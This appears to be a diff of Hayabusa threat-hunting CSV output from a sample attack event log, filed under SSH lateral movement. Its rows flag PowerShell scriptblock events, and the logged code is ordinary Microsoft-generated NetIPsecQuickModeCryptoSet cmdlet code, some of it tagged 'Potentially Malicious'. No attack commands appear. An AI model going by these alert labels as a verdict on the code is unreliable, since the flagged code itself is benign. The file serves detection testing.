SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery')",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' -Alias '*' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' -Alias '*' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, 